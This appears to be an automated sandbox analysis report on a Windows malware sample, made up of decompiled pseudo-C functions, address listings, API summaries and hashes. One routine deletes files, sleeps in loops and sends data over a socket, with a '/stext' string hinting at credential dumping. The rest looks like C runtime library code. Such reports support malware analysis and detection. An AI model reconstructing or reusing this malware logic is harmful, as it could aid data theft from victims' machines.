                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    					}
                    					E00401FD8();
                    					E00401F09();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					return E00401FD8();
                    					L25:
                    					Sleep(0x64);
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					_t504 = _t504 + 1;
                    					_t533 = _t504 - 0xa;
                    				} while (_t504 < 0xa);
                    				goto L28;
                    			}


































                    0x004128d6
                    0x004128e3
                    0x004128ef
                    0x004128fb
                    0x00412900
                    0x00412906
                    0x00412908
                    0x0041290c
                    0x00412911
                    0x00412916
                    0x00412931
                    0x0041293b
                    0x0041295a
                    0x00412964
                    0x00412974
                    0x0041297a
                    0x00412983
                    0x0041298d
                    0x00412992
                    0x00412994
                    0x0041299b
                    0x004129e9
                    0x004129ee
                    0x004129fb
                    0x004129ff
                    0x00412a08
                    0x00412a11
                    0x00412a1a
                    0x00412a24
                    0x00000000
                    0x00000000
                    0x00412a28
                    0x00412a2a
                    0x00412a2e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412a2e
                    0x00412a34
                    0x00412a36
                    0x00412a3d
                    0x00412a8b
                    0x00412a90
                    0x00412a9d
                    0x00412aa1
                    0x00412aaa
                    0x00412ab3
                    0x00412abc
                    0x00412ac6
                    0x00000000
                    0x00000000
                    0x00412aca
                    0x00412acc
                    0x00412ad0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412ad0
                    0x00412ad6
                    0x00412ad8
                    0x00412adf
                    0x00412b2d
                    0x00412b32
                    0x00412b3f
                    0x00412b43
                    0x00412b4c
                    0x00412b55
                    0x00412b5e
                    0x00412b68
                    0x00000000
                    0x00000000
                    0x00412b6c
                    0x00412b6e
                    0x00412b72
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412b72
                    0x00412b7a
                    0x00412b86
                    0x00412b91
                    0x00412b94
                    0x00412b97
                    0x00412b99
                    0x00412ba1
                    0x00412ba8
                    0x00412bbd
                    0x00412bce
                    0x00412bce
                    0x00412bdb
                    0x00412bf0
                    0x00412c0d
                    0x00412bf2
                    0x00412bf2
                    0x00412bfb
                    0x00412c05
                    0x00412c05
                    0x00412c18
                    0x00412c1d
                    0x00412c2d
                    0x00412c36
                    0x00412c41
                    0x00412c41
                    0x00412c49
                    0x00000000
                    0x00000000
                    0x00412c5b
                    0x00412c5d
                    0x00412c61
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412c61
                    0x00412c6e
                    0x00412c73
                    0x00412c79
                    0x00412cd6
                    0x00412ce2
                    0x00412cee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412cf3
                    0x00412d01
                    0x00412d0d
                    0x00412d12
                    0x00412d21
                    0x00412d2c
                    0x00412d31
                    0x00412d38
                    0x00412d49
                    0x00412d4e
                    0x00412d55
                    0x00412d57
                    0x00412eb5
                    0x00412f4d
                    0x00412f53
                    0x00412f5a
                    0x00412f66
                    0x00412f72
                    0x00412f7e
                    0x00412f8a
                    0x00412f93
                    0x00412f9c
                    0x00412fa5
                    0x00412d5d
                    0x00412d64
                    0x00412d69
                    0x00412d7e
                    0x00412e27
                    0x00412e2d
                    0x00412e34
                    0x00412e3d
                    0x00412e46
                    0x00412e4f
                    0x00412e58
                    0x00412e64
                    0x00412e70
                    0x00412e7c
                    0x00412e88
                    0x00412e94
                    0x00412ea0
                    0x00412ea5
                    0x00412fae
                    0x00412fba
                    0x00412fc6
                    0x00412fd2
                    0x00412fde
                    0x00412fea
                    0x00412ff6
                    0x00413002
                    0x0041300e
                    0x0041301a
                    0x00413035
                    0x00412c9b
                    0x00412c9d
                    0x00412ca6
                    0x00412cb2
                    0x00412cbe
                    0x00412cc3
                    0x00412cc4
                    0x00412cc4
                    0x00000000

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004128D6
                      • Part of subcall function 0041B40D: GetCurrentProcessId.KERNEL32(00000000,76B7FBB0,00000000,?,?,?,?,0046B928,0040D016,.vbs,?,?,?,?,?,004742D8), ref: 0041B434
                      • Part of subcall function 00417FFD: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00464E64), ref: 00418013
                      • Part of subcall function 00417FFD: CloseHandle.KERNEL32(dNF,?,?,004040F5,00464E64), ref: 0041801C
                    • Sleep.KERNEL32(0000000A,00464E64), ref: 00412A28
                    • Sleep.KERNEL32(0000000A,00464E64,00464E64), ref: 00412ACA
                    • Sleep.KERNEL32(0000000A,00464E64,00464E64,00464E64), ref: 00412B6C
                    • DeleteFileW.KERNEL32(00000000,00464E64,00464E64,00464E64), ref: 00412BCE
                    • DeleteFileW.KERNEL32(00000000,00464E64,00464E64,00464E64), ref: 00412C05
                    • DeleteFileW.KERNEL32(00000000,00464E64,00464E64,00464E64), ref: 00412C41
                    • Sleep.KERNEL32(000001F4,00464E64,00464E64,00464E64), ref: 00412C5B
                    • Sleep.KERNEL32(00000064), ref: 00412C9D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "
                    • API String ID: 1223786279-3856184850
                    • Opcode ID: 6851dc846205746844b603425c56da79d4857d5684724b3901191e42c3b6cda9
                    • Instruction ID: 7843681fa9e8f845808161493167f24127c019ab59a7f8e2cee9b6578ac5f845
                    • Opcode Fuzzy Hash: 6851dc846205746844b603425c56da79d4857d5684724b3901191e42c3b6cda9
                    • Instruction Fuzzy Hash: 190225315083414AC329FB22D851AEFB3E5AFD4348F50483FF58A931E2EF785989C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E004555EB(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v36;
                    				signed int _v44;
                    				void _v48;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t114;
                    				signed int _t123;
                    				signed char _t124;
                    				signed int _t134;
                    				intOrPtr _t164;
                    				intOrPtr _t180;
                    				signed int* _t190;
                    				signed int _t192;
                    				char _t197;
                    				signed int _t203;
                    				signed int _t206;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t219;
                    				signed int _t225;
                    				signed int _t227;
                    				signed int _t234;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed char _t242;
                    				intOrPtr _t245;
                    				void* _t248;
                    				void* _t252;
                    				void* _t262;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t270;
                    				void* _t272;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				void* _t284;
                    
                    				_t262 = E0045534E(__ecx,  &_v72, _a16, _a20, _a24);
                    				_t192 = 6;
                    				memcpy( &_v48, _t262, _t192 << 2);
                    				_t274 = _t272 + 0x1c;
                    				_t248 = _t262 + _t192 + _t192;
                    				_t263 = _t262 | 0xffffffff;
                    				if(_v36 != _t263) {
                    					_t114 = E0044FD05(_t248, _t263, __eflags);
                    					_t190 = _a8;
                    					 *_t190 = _t114;
                    					__eflags = _t114 - _t263;
                    					if(_t114 != _t263) {
                    						_v20 = _v20 & 0x00000000;
                    						_v24 = 0xc;
                    						_t275 = _t274 - 0x18;
                    						 *_a4 = 1;
                    						_push(6);
                    						_v16 =  !(_a16 >> 7) & 1;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t275,  &_v48, 1 << 2);
                    						_t197 = 0;
                    						_t252 = E004552B9();
                    						_t277 = _t275 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							L11:
                    							_t123 = GetFileType(_t252);
                    							__eflags = _t123;
                    							if(_t123 != 0) {
                    								__eflags = _t123 - 2;
                    								if(_t123 != 2) {
                    									__eflags = _t123 - 3;
                    									_t124 = _v48;
                    									if(_t123 == 3) {
                    										_t124 = _t124 | 0x00000008;
                    										__eflags = _t124;
                    									}
                    								} else {
                    									_t124 = _v48 | 0x00000040;
                    								}
                    								_v5 = _t124;
                    								E0044FC4E(_t197,  *_t190, _t252);
                    								_t242 = _v5 | 0x00000001;
                    								_v5 = _t242;
                    								_v48 = _t242;
                    								 *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                    								_t203 =  *_t190;
                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                    								__eflags = _a16 & 0x00000002;
                    								 *((char*)( *((intOrPtr*)(0x471810 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                    								if((_a16 & 0x00000002) == 0) {
                    									L20:
                    									_v6 = 0;
                    									_push( &_v6);
                    									_push(_a16);
                    									_t278 = _t277 - 0x18;
                    									_t206 = 6;
                    									_push( *_t190);
                    									memcpy(_t278,  &_v48, _t206 << 2);
                    									_t134 = E0045506C(_t190,  &_v48 + _t206 + _t206,  &_v48);
                    									_t280 = _t278 + 0x30;
                    									__eflags = _t134;
                    									if(__eflags == 0) {
                    										 *((char*)( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                    										 *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                    										__eflags = _v5 & 0x00000048;
                    										if((_v5 & 0x00000048) == 0) {
                    											__eflags = _a16 & 0x00000008;
                    											if((_a16 & 0x00000008) != 0) {
                    												_t225 =  *_t190;
                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                    												_t164 =  *((intOrPtr*)(0x471810 + (_t225 >> 6) * 4));
                    												_t87 = _t164 + _t227 + 0x28;
                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                    												__eflags =  *_t87;
                    											}
                    										}
                    										_t266 = _v44;
                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                    											L31:
                    											__eflags = 0;
                    											return 0;
                    										} else {
                    											__eflags = _a16 & 0x00000001;
                    											if((_a16 & 0x00000001) == 0) {
                    												goto L31;
                    											}
                    											CloseHandle(_v12);
                    											_v44 = _t266 & 0x7fffffff;
                    											_t215 = 6;
                    											_push( &_v24);
                    											_push(_a12);
                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                    											_t245 = E004552B9();
                    											__eflags = _t245 - 0xffffffff;
                    											if(_t245 != 0xffffffff) {
                    												_t217 =  *_t190;
                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                    												__eflags = _t219;
                    												 *((intOrPtr*)( *((intOrPtr*)(0x471810 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                    												goto L31;
                    											}
                    											E0043FF87(GetLastError());
                    											 *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    											E0044FE17( *_t190);
                    											L10:
                    											goto L2;
                    										}
                    									}
                    									_t269 = _t134;
                    									goto L22;
                    								} else {
                    									_t269 = E004554CA(_t205,  *_t190);
                    									__eflags = _t269;
                    									if(__eflags != 0) {
                    										L22:
                    										E0044B77B(__eflags,  *_t190);
                    										return _t269;
                    									}
                    									goto L20;
                    								}
                    							}
                    							_t270 = GetLastError();
                    							E0043FF87(_t270);
                    							 *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x471810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    							CloseHandle(_t252);
                    							__eflags = _t270;
                    							if(_t270 == 0) {
                    								 *((intOrPtr*)(E0043FFBD())) = 0xd;
                    							}
                    							goto L2;
                    						}
                    						_t234 = _v44;
                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                    							L9:
                    							_t235 =  *_t190;
                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                    							_t180 =  *((intOrPtr*)(0x471810 + (_t235 >> 6) * 4));
                    							_t33 = _t180 + _t237 + 0x28;
                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                    							__eflags =  *_t33;
                    							E0043FF87(GetLastError());
                    							goto L10;
                    						}
                    						__eflags = _a16 & 0x00000001;
                    						if((_a16 & 0x00000001) == 0) {
                    							goto L9;
                    						}
                    						_t284 = _t277 - 0x18;
                    						_v44 = _t234 & 0x7fffffff;
                    						_t239 = 6;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t284,  &_v48, _t239 << 2);
                    						_t197 = 0;
                    						_t252 = E004552B9();
                    						_t277 = _t284 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							goto L11;
                    						}
                    						goto L9;
                    					} else {
                    						 *(E0043FFAA()) =  *_t186 & 0x00000000;
                    						 *_t190 = _t263;
                    						 *((intOrPtr*)(E0043FFBD())) = 0x18;
                    						goto L2;
                    					}
                    				} else {
                    					 *(E0043FFAA()) =  *_t188 & 0x00000000;
                    					 *_a8 = _t263;
                    					L2:
                    					return  *((intOrPtr*)(E0043FFBD()));
                    				}
                    			}





















































                    0x0045560e
                    0x00455612
                    0x00455613
                    0x00455613
                    0x00455613
                    0x00455615
                    0x0045561b
                    0x00455636
                    0x0045563b
                    0x0045563e
                    0x00455640
                    0x00455642
                    0x00455661
                    0x00455668
                    0x0045566f
                    0x00455672
                    0x0045567e
                    0x00455681
                    0x00455689
                    0x0045568a
                    0x0045568d
                    0x0045568d
                    0x00455694
                    0x00455696
                    0x00455699
                    0x004556a1
                    0x004556a4
                    0x00455711
                    0x00455712
                    0x00455718
                    0x0045571a
                    0x00455763
                    0x00455766
                    0x0045576f
                    0x00455772
                    0x00455775
                    0x00455777
                    0x00455777
                    0x00455777
                    0x00455768
                    0x0045576b
                    0x0045576b
                    0x0045577c
                    0x0045577f
                    0x0045578b
                    0x00455790
                    0x0045579c
                    0x004557a6
                    0x004557aa
                    0x004557b4
                    0x004557b7
                    0x004557c2
                    0x004557c7
                    0x004557d7
                    0x004557da
                    0x004557de
                    0x004557df
                    0x004557e5
                    0x004557ea
                    0x004557ed
                    0x004557ef
                    0x004557f1
                    0x004557f6
                    0x004557f9
                    0x004557fb
                    0x00455825
                    0x00455849
                    0x0045584d
                    0x00455851
                    0x00455853
                    0x00455857
                    0x00455859
                    0x00455863
                    0x00455866
                    0x0045586d
                    0x0045586d
                    0x0045586d
                    0x0045586d
                    0x00455857
                    0x00455872
                    0x0045587e
                    0x00455880
                    0x0045590b
                    0x0045590b
                    0x00000000
                    0x00455886
                    0x00455886
                    0x0045588a
                    0x00000000
                    0x00000000
                    0x0045588f
                    0x004558a1
                    0x004558a9
                    0x004558ac
                    0x004558ad
                    0x004558b0
                    0x004558b7
                    0x004558bc
                    0x004558bf
                    0x004558f3
                    0x004558fd
                    0x004558fd
                    0x00455907
                    0x00000000
                    0x00455907
                    0x004558c8
                    0x004558e1
                    0x004558e8
                    0x0045570b
                    0x00000000
                    0x0045570b
                    0x00455880
                    0x004557fd
                    0x00000000
                    0x004557c9
                    0x004557d0
                    0x004557d3
                    0x004557d5
                    0x004557ff
                    0x00455801
                    0x00000000
                    0x00455807
                    0x00000000
                    0x004557d5
                    0x004557c7
                    0x00455722
                    0x00455725
                    0x00455740
                    0x00455745
                    0x0045574b
                    0x0045574d
                    0x00455758
                    0x00455758
                    0x00000000
                    0x0045574d
                    0x004556a6
                    0x004556ad
                    0x004556af
                    0x004556e6
                    0x004556e6
                    0x004556f0
                    0x004556f3
                    0x004556fa
                    0x004556fa
                    0x004556fa
                    0x00455706
                    0x00000000
                    0x00455706
                    0x004556b1
                    0x004556b5
                    0x00000000
                    0x00000000
                    0x004556b7
                    0x004556c6
                    0x004556cb
                    0x004556ce
                    0x004556cf
                    0x004556d2
                    0x004556d2
                    0x004556d9
                    0x004556db
                    0x004556de
                    0x004556e1
                    0x004556e4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00455644
                    0x00455649
                    0x0045564c
                    0x00455653
                    0x00000000
                    0x00455653
                    0x0045561d
                    0x00455622
                    0x00455628
                    0x0045562a
                    0x00000000
                    0x0045562f

                    APIs
                      • Part of subcall function 004552B9: CreateFileW.KERNEL32(00000000,00000000,?,00455694,?,?,00000000,?,00455694,00000000,0000000C), ref: 004552D6
                    • GetLastError.KERNEL32 ref: 004556FF
                    • __dosmaperr.LIBCMT ref: 00455706
                    • GetFileType.KERNEL32(00000000), ref: 00455712
                    • GetLastError.KERNEL32 ref: 0045571C
                    • __dosmaperr.LIBCMT ref: 00455725
                    • CloseHandle.KERNEL32(00000000), ref: 00455745
                    • CloseHandle.KERNEL32(?), ref: 0045588F
                    • GetLastError.KERNEL32 ref: 004558C1
                    • __dosmaperr.LIBCMT ref: 004558C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: ea07ce94ea24fc73b31206ca709ff3d359b3d44411218118bd233976458b9849
                    • Instruction ID: 5fdc0657fe19e3b3bef7ffef5b26e1168a429a16cf5e7346e0a994167888a5c7
                    • Opcode Fuzzy Hash: ea07ce94ea24fc73b31206ca709ff3d359b3d44411218118bd233976458b9849
                    • Instruction Fuzzy Hash: 1EA14B329105449FDF199F68DC617BE7BA0AB0A325F14015EFC15DB3A2DB388C1ACB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00453793(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                    				signed int _v8;
                    				char _v22;
                    				struct _cpinfo _v28;
                    				short* _v32;
                    				int _v36;
                    				char* _v40;
                    				signed int _v44;
                    				intOrPtr _v48;
                    				void* _v60;
                    				signed int _t63;
                    				int _t70;
                    				signed int _t72;
                    				short* _t73;
                    				signed int _t77;
                    				short* _t87;
                    				void* _t89;
                    				void* _t92;
                    				int _t99;
                    				intOrPtr _t101;
                    				intOrPtr _t102;
                    				signed int _t112;
                    				char* _t114;
                    				char* _t115;
                    				void* _t120;
                    				void* _t121;
                    				intOrPtr _t122;
                    				intOrPtr _t123;
                    				intOrPtr* _t125;
                    				short* _t126;
                    				int _t128;
                    				int _t129;
                    				short* _t130;
                    				intOrPtr* _t131;
                    				signed int _t132;
                    				short* _t133;
                    
                    				_t63 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t63 ^ _t132;
                    				_t128 = _a20;
                    				_v44 = _a4;
                    				_v48 = _a8;
                    				_t67 = _a24;
                    				_v40 = _a24;
                    				_t125 = _a16;
                    				_v36 = _t125;
                    				if(_t128 <= 0) {
                    					if(_t128 >= 0xffffffff) {
                    						goto L2;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					_t128 = E00446156(_t125, _t128);
                    					_t67 = _v40;
                    					L2:
                    					_t99 = _a28;
                    					if(_t99 <= 0) {
                    						if(_t99 < 0xffffffff) {
                    							goto L5;
                    						} else {
                    							goto L7;
                    						}
                    					} else {
                    						_t99 = E00446156(_t67, _t99);
                    						L7:
                    						_t70 = _a32;
                    						if(_t70 == 0) {
                    							_t14 =  &_v44; // 0x453a6c
                    							_t70 =  *( *((intOrPtr*)( *_t14)) + 8);
                    							_a32 = _t70;
                    						}
                    						if(_t128 == 0 || _t99 == 0) {
                    							if(_t128 != _t99) {
                    								if(_t99 <= 1) {
                    									if(_t128 <= 1) {
                    										if(GetCPInfo(_t70,  &_v28) == 0) {
                    											goto L5;
                    										} else {
                    											if(_t128 <= 0) {
                    												if(_t99 <= 0) {
                    													goto L36;
                    												} else {
                    													_t89 = 2;
                    													if(_v28 >= _t89) {
                    														_t114 =  &_v22;
                    														if(_v22 != 0) {
                    															_t131 = _v40;
                    															while(1) {
                    																_t122 =  *((intOrPtr*)(_t114 + 1));
                    																if(_t122 == 0) {
                    																	goto L15;
                    																}
                    																_t101 =  *_t131;
                    																if(_t101 <  *_t114 || _t101 > _t122) {
                    																	_t114 = _t114 + _t89;
                    																	if( *_t114 != 0) {
                    																		continue;
                    																	} else {
                    																		goto L15;
                    																	}
                    																}
                    																goto L63;
                    															}
                    														}
                    													}
                    													goto L15;
                    												}
                    											} else {
                    												_t92 = 2;
                    												if(_v28 >= _t92) {
                    													_t115 =  &_v22;
                    													if(_v22 != 0) {
                    														while(1) {
                    															_t123 =  *((intOrPtr*)(_t115 + 1));
                    															if(_t123 == 0) {
                    																goto L17;
                    															}
                    															_t102 =  *_t125;
                    															if(_t102 <  *_t115 || _t102 > _t123) {
                    																_t115 = _t115 + _t92;
                    																if( *_t115 != 0) {
                    																	continue;
                    																} else {
                    																	goto L17;
                    																}
                    															}
                    															goto L63;
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    									} else {
                    										L17:
                    										_push(3);
                    										goto L13;
                    									}
                    								} else {
                    									L15:
                    								}
                    							} else {
                    								_push(2);
                    								L13:
                    							}
                    						} else {
                    							L36:
                    							_t126 = 0;
                    							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                    							_v44 = _t72;
                    							if(_t72 == 0) {
                    								L5:
                    							} else {
                    								_t120 = _t72 + _t72;
                    								asm("sbb eax, eax");
                    								if((_t120 + 0x00000008 & _t72) == 0) {
                    									_t73 = 0;
                    									_v32 = 0;
                    									goto L45;
                    								} else {
                    									asm("sbb eax, eax");
                    									_t85 = _t72 & _t120 + 0x00000008;
                    									_t112 = _t120 + 8;
                    									if((_t72 & _t120 + 0x00000008) > 0x400) {
                    										asm("sbb eax, eax");
                    										_t87 = E00445B29(_t112, _t85 & _t112);
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											goto L61;
                    										} else {
                    											 *_t87 = 0xdddd;
                    											goto L43;
                    										}
                    									} else {
                    										asm("sbb eax, eax");
                    										E00456BA0();
                    										_t87 = _t133;
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											L61:
                    											_t100 = _v32;
                    										} else {
                    											 *_t87 = 0xcccc;
                    											L43:
                    											_t73 =  &(_t87[4]);
                    											_v32 = _t73;
                    											L45:
                    											if(_t73 == 0) {
                    												goto L61;
                    											} else {
                    												_t40 =  &_v44; // 0x453a6c
                    												_t129 = _a32;
                    												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73,  *_t40) == 0) {
                    													goto L61;
                    												} else {
                    													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                    													_v36 = _t77;
                    													if(_t77 == 0) {
                    														goto L61;
                    													} else {
                    														_t121 = _t77 + _t77;
                    														_t108 = _t121 + 8;
                    														asm("sbb eax, eax");
                    														if((_t121 + 0x00000008 & _t77) == 0) {
                    															_t130 = _t126;
                    															goto L56;
                    														} else {
                    															asm("sbb eax, eax");
                    															_t81 = _t77 & _t121 + 0x00000008;
                    															_t108 = _t121 + 8;
                    															if((_t77 & _t121 + 0x00000008) > 0x400) {
                    																asm("sbb eax, eax");
                    																_t130 = E00445B29(_t108, _t81 & _t108);
                    																_pop(_t108);
                    																if(_t130 == 0) {
                    																	goto L59;
                    																} else {
                    																	 *_t130 = 0xdddd;
                    																	goto L54;
                    																}
                    															} else {
                    																asm("sbb eax, eax");
                    																E00456BA0();
                    																_t130 = _t133;
                    																if(_t130 == 0) {
                    																	L59:
                    																	_t100 = _v32;
                    																} else {
                    																	 *_t130 = 0xcccc;
                    																	L54:
                    																	_t130 =  &(_t130[4]);
                    																	L56:
                    																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t100 = _v32;
                    																		_t126 = E0044803E(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                    																	}
                    																}
                    															}
                    														}
                    														E0043585D(_t130);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								E0043585D(_t100);
                    							}
                    						}
                    					}
                    				}
                    				L63:
                    				return E004349BB(_v8 ^ _t132);
                    			}






































                    0x0045379b
                    0x004537a2
                    0x004537aa
                    0x004537ad
                    0x004537b3
                    0x004537b6
                    0x004537b9
                    0x004537bd
                    0x004537c0
                    0x004537c5
                    0x004537ec
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004537c7
                    0x004537cf
                    0x004537d1
                    0x004537d5
                    0x004537d5
                    0x004537da
                    0x004537f8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004537dc
                    0x004537e5
                    0x004537fa
                    0x004537fa
                    0x004537ff
                    0x00453801
                    0x00453806
                    0x00453809
                    0x00453809
                    0x0045380e
                    0x0045381a
                    0x00453827
                    0x00453834
                    0x00453847
                    0x00000000
                    0x00453849
                    0x0045384b
                    0x0045387e
                    0x00000000
                    0x00453880
                    0x00453882
                    0x00453886
                    0x0045388c
                    0x0045388f
                    0x00453891
                    0x00453894
                    0x00453894
                    0x00453899
                    0x00000000
                    0x00000000
                    0x0045389b
                    0x0045389f
                    0x004538a9
                    0x004538ae
                    0x00000000
                    0x004538b0
                    0x00000000
                    0x004538b0
                    0x004538ae
                    0x00000000
                    0x0045389f
                    0x00453894
                    0x0045388f
                    0x00000000
                    0x00453886
                    0x0045384d
                    0x0045384f
                    0x00453853
                    0x00453859
                    0x0045385c
                    0x0045385e
                    0x0045385e
                    0x00453863
                    0x00000000
                    0x00000000
                    0x00453865
                    0x00453869
                    0x00453873
                    0x00453878
                    0x00000000
                    0x0045387a
                    0x00000000
                    0x0045387a
                    0x00453878
                    0x00000000
                    0x00453869
                    0x0045385e
                    0x0045385c
                    0x00000000
                    0x00453853
                    0x0045384b
                    0x00453836
                    0x00453836
                    0x00453836
                    0x00000000
                    0x00453836
                    0x00453829
                    0x00453829
                    0x0045382b
                    0x0045381c
                    0x0045381c
                    0x0045381e
                    0x0045381e
                    0x004538b5
                    0x004538b5
                    0x004538b5
                    0x004538c2
                    0x004538c8
                    0x004538cd
                    0x004537ee
                    0x004538d3
                    0x004538d3
                    0x004538db
                    0x004538df
                    0x0045393a
                    0x0045393c
                    0x00000000
                    0x004538e1
                    0x004538e6
                    0x004538e8
                    0x004538ea
                    0x004538f2
                    0x00453916
                    0x0045391b
                    0x00453920
                    0x00453926
                    0x00000000
                    0x0045392c
                    0x0045392c
                    0x00000000
                    0x0045392c
                    0x004538f4
                    0x004538f6
                    0x004538fa
                    0x004538ff
                    0x00453901
                    0x00453906
                    0x00453a1b
                    0x00453a1b
                    0x0045390c
                    0x0045390c
                    0x00453932
                    0x00453932
                    0x00453935
                    0x0045393f
                    0x00453941
                    0x00000000
                    0x00453947
                    0x00453947
                    0x0045394f
                    0x0045395d
                    0x00000000
                    0x00453963
                    0x0045396c
                    0x00453972
                    0x00453977
                    0x00000000
                    0x0045397d
                    0x0045397d
                    0x00453980
                    0x00453985
                    0x00453989
                    0x004539d5
                    0x00000000
                    0x0045398b
                    0x00453990
                    0x00453992
                    0x00453994
                    0x0045399c
                    0x004539b9
                    0x004539c3
                    0x004539c5
                    0x004539c8
                    0x00000000
                    0x004539ca
                    0x004539ca
                    0x00000000
                    0x004539ca
                    0x0045399e
                    0x004539a0
                    0x004539a4
                    0x004539a9
                    0x004539ad
                    0x00453a0f
                    0x00453a0f
                    0x004539af
                    0x004539af
                    0x004539d0
                    0x004539d0
                    0x004539d7
                    0x004539d9
                    0x00000000
                    0x004539f2
                    0x004539f2
                    0x00453a0b
                    0x00453a0b
                    0x004539d9
                    0x004539ad
                    0x0045399c
                    0x00453a13
                    0x00453a18
